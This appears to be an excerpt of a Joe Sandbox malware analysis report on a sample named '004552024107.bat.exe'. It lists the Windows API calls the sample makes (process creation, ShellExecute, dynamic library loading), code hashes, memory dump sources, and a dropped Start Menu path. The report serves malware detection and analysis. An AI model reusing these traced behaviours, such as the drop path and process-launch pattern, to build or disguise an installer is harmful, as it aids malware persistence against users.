                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                                        • Instruction ID: f513ac05e70e3adf76b651c0ca8ec4e95b66ff2fdc1b64d79a05bcbbe3c40a95
                                        • Opcode Fuzzy Hash: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                                        • Instruction Fuzzy Hash: 4DC09BB17403027BFE209B529E45F077798D790700F1554397754F54D0C774D410D62C
                                        APIs
                                        • SendMessageA.USER32(00000028,?,?,00404192), ref: 00404370
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
                                        • Instruction ID: 50a7fc5ec129452a525cde7c4fd9a9aa290cced010421ab9f43a5acdc6dad314
                                        • Opcode Fuzzy Hash: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
                                        • Instruction Fuzzy Hash: 33B0127A781601BBDE615B40DF09F457EB2E768701F408039B348240F0CEB200A9DB2C
                                        APIs
                                        • ShellExecuteExA.SHELL32(?,00404774,?), ref: 00405978
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: ExecuteShell
                                        • String ID:
                                        • API String ID: 587946157-0
                                        • Opcode ID: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                        • Instruction ID: 923d99ad9cc7c2cd2e65252a1a37f78a8d30594c4c7a615bb4925eb6a4e84790
                                        • Opcode Fuzzy Hash: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                        • Instruction Fuzzy Hash: 27C092B2000200DFE301CF90CB08F067BF8AF54306F028068E184DA060C7788840CB29
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030F6,?,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 0040339E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                        • Instruction ID: 699dda5fb03a211c19396a68767747e6c986426da1756d7c47186a7ffa8d2f84
                                        • Opcode Fuzzy Hash: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                        • Instruction Fuzzy Hash: EBB01231140300BFDA214F00DF09F057B21AB94710F10C034B384780F086711075EB0E
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,0040412B), ref: 00404359
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
                                        • Instruction ID: b84ed7fd3cc5f3c3e9fcd53eb4babc11f88d3e7fa425116ebe2a9639eb74f9e6
                                        • Opcode Fuzzy Hash: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
                                        • Instruction Fuzzy Hash: 28A00176505500AFCA12AB50EF1980ABB66ABA4741B818479A685601358B768831EB1B
                                        APIs
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000,00424440,757B23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000,00424440,757B23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                          • Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000,00424440,757B23A0), ref: 0040542D
                                          • Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll), ref: 0040543F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                          • Part of subcall function 00405926: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,00431800,00431800,00431800,?,00431400,00000000), ref: 0040594F
                                          • Part of subcall function 00405926: CloseHandle.KERNEL32(?), ref: 0040595C
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FE5
                                          • Part of subcall function 0040672A: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040673B
                                          • Part of subcall function 0040672A: GetExitCodeProcess.KERNEL32(?,?), ref: 0040675D
                                          • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                        • String ID:
                                        • API String ID: 2972824698-0
                                        • Opcode ID: 1750d852ef655aad6943f12ff86d7c5be13c4aa94793d558f94d59855ccbac7d
                                        • Instruction ID: 2907458289dc89520fdc1db2e5a40f60bb15031deda838765eaf0f6b46983df9
                                        • Opcode Fuzzy Hash: 1750d852ef655aad6943f12ff86d7c5be13c4aa94793d558f94d59855ccbac7d
                                        • Instruction Fuzzy Hash: 0EF05B31905112DBCF20ABA55D849EF71E4DB0135CB11413FF501F21D2D7BC4A46DAAE
                                        APIs
                                        • Sleep.KERNELBASE(00000000), ref: 004014E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 1086b86eff6ccb0646e334d3d3a43b9eec11b9d4dc04b4a1abbda41f1d779818
                                        • Instruction ID: 2b610f9d6ca2559d84a6cccd890523da06de060bf9d54f72eb9b50da0c514afd
                                        • Opcode Fuzzy Hash: 1086b86eff6ccb0646e334d3d3a43b9eec11b9d4dc04b4a1abbda41f1d779818
                                        • Instruction Fuzzy Hash: 1CD05E73B142009BDB60DBB8BEC445F73E4E7403257304837E502E2092E5788946861C
                                        APIs
                                        • CharNextA.USER32(?,004035B4,"C:\Users\user\Desktop\004552024107.bat.exe",00000020,"C:\Users\user\Desktop\004552024107.bat.exe",00000000,?,00000008,0000000A,0000000C), ref: 00405C57
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CharNext
                                        • String ID:
                                        • API String ID: 3213498283-0
                                        • Opcode ID: ebfd4497f4770e630c7fa17400fe2fa5f8acca5723c9a3fa4a0afe310da1b6cd
                                        • Instruction ID: 4cb6b3427928debfdf1719c4bcab7adc6768491598412c2af55c23fcd8af848d
                                        • Opcode Fuzzy Hash: ebfd4497f4770e630c7fa17400fe2fa5f8acca5723c9a3fa4a0afe310da1b6cd
                                        • Instruction Fuzzy Hash: 59C0803000C78057E550676092684677FE09E52740F584456F0C173151C13459449F1D
                                        APIs
                                        • GetDlgItem.USER32(?,000003FB), ref: 0040480E
                                        • SetWindowTextA.USER32(00000000,?), ref: 00404838
                                        • SHBrowseForFolderA.SHELL32(?,00429860,?), ref: 004048E9
                                        • CoTaskMemFree.OLE32(00000000), ref: 004048F4
                                        • lstrcmpiA.KERNEL32(Call,0042A488), ref: 00404926
                                        • lstrcatA.KERNEL32(?,Call), ref: 00404932
                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404944
                                          • Part of subcall function 00405987: GetDlgItemTextA.USER32(?,?,00000400,0040497B), ref: 0040599A
                                          • Part of subcall function 00406587: CharNextA.USER32(0000000C,*?|<>/":,00000000,?,757B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                          • Part of subcall function 00406587: CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,757B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                          • Part of subcall function 00406587: CharNextA.USER32(0000000C,?,757B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                          • Part of subcall function 00406587: CharPrevA.USER32(0000000C,0000000C,757B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                        • GetDiskFreeSpaceA.KERNEL32(00429458,?,?,0000040F,?,00429458,00429458,?,?,00429458,?,?,000003FB,?), ref: 00404A02
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A1D
                                          • Part of subcall function 00404B76: lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                          • Part of subcall function 00404B76: wsprintfA.USER32 ref: 00404C1C
                                          • Part of subcall function 00404B76: SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes$Call
                                        • API String ID: 2624150263-243749230
                                        • Opcode ID: 0a9a22de57e54a42c41f7f9c473854a5632b4b75f318642da20d5b1a73d2513c
                                        • Instruction ID: f53f9ae5ebeaccab956e1b2ad526c51027fc30446c854342799b5ba7b8d0bc76
                                        • Opcode Fuzzy Hash: 0a9a22de57e54a42c41f7f9c473854a5632b4b75f318642da20d5b1a73d2513c
                                        • Instruction Fuzzy Hash: BAA172F1A00209ABDB11AFA5CD45AAF76B8EF84314F14807BF611B62D1D77C89418F6D
                                        APIs
                                          • Part of subcall function 6C6012A5: GlobalAlloc.KERNEL32(00000040,6C6012C3,?,6C60135F,-6C60504B,6C6011C0,-000000A0), ref: 6C6012AD
                                        • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 6C601C54
                                        • lstrcpyA.KERNEL32(00000008,?), ref: 6C601C9C
                                        • lstrcpyA.KERNEL32(00000408,?), ref: 6C601CA6
                                        • GlobalFree.KERNEL32(00000000), ref: 6C601CB9
                                        • GlobalFree.KERNEL32(?), ref: 6C601D99
                                        • GlobalFree.KERNEL32(?), ref: 6C601D9E
                                        • GlobalFree.KERNEL32(?), ref: 6C601DA3
                                        • GlobalFree.KERNEL32(00000000), ref: 6C601F8A
                                        • lstrcpyA.KERNEL32(?,?), ref: 6C602128
                                        • GetModuleHandleA.KERNEL32(00000008), ref: 6C6021A4
                                        • LoadLibraryA.KERNEL32(00000008), ref: 6C6021B5
                                        • GetProcAddress.KERNEL32(?,?), ref: 6C60220E
                                        • lstrlenA.KERNEL32(00000408), ref: 6C602228
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86267191150.000000006C601000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C600000, based on PE: true
                                        • Associated: 00000000.00000002.86267155201.000000006C600000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000000.00000002.86267225002.000000006C604000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000000.00000002.86267260674.000000006C606000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c600000_004552024107.jbxd
                                        Similarity
                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                        • String ID:
                                        • API String ID: 245916457-0
                                        • Opcode ID: 41067a54e42f53b727e73a9f8739107ebd999a78cadf3d64517a7955b3012577
                                        • Instruction ID: f24e1e2c4a76dbc1112ea0cd4ea555347cf86a36a2dec55b86c044b0c0edbc62
                                        • Opcode Fuzzy Hash: 41067a54e42f53b727e73a9f8739107ebd999a78cadf3d64517a7955b3012577
                                        • Instruction Fuzzy Hash: 03228C71B44209DFDB188FA9C6847EDBBF4BF0630DF20852ED1A6B2A80D7749585CB58
                                        APIs
                                        • CoCreateInstance.OLE32(0040851C,?,?,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040221D
                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022CF
                                        Strings
                                        • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Storfyrstindes, xrefs: 0040225D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Storfyrstindes
                                        • API String ID: 123533781-1191349742
                                        • Opcode ID: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
                                        • Instruction ID: 9693176738af107330769ac86e8646dde0b712c02a361864b0ed1875b7ced88a
                                        • Opcode Fuzzy Hash: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
                                        • Instruction Fuzzy Hash: DB511971A00208AFDF00EFA4CA88A9D7BB5FF48314F2045BAF505FB2D1DA799981CB54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                                        • Instruction ID: 8768c5d39ca9d5d04b1d74764d0b3cf6a08d2071900a395e822ff8491b177041
                                        • Opcode Fuzzy Hash: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                                        • Instruction Fuzzy Hash: D0E18B7190470ACFDB24CF58C880BAAB7F1FB44305F15842EE497A72D1E738AA95CB14
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
                                        • Instruction ID: 112ec8b08e22b9c6c3aeb56eb94a2e19ac2cef272eed527e1014fed5102c6f46
                                        • Opcode Fuzzy Hash: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
                                        • Instruction Fuzzy Hash: 33C13631E04219DBCF18CF68D8905EEBBB2BF98314F25866AD85677380D734A942CF95
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 00404D49
                                        • GetDlgItem.USER32(?,00000408), ref: 00404D56
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DA5
                                        • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404DBC
                                        • SetWindowLongA.USER32(?,000000FC,00405345), ref: 00404DD6
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DE8
                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DFC
                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404E12
                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404E1E
                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404E2E
                                        • DeleteObject.GDI32(00000110), ref: 00404E33
                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E5E
                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E6A
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F04
                                        • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404F34
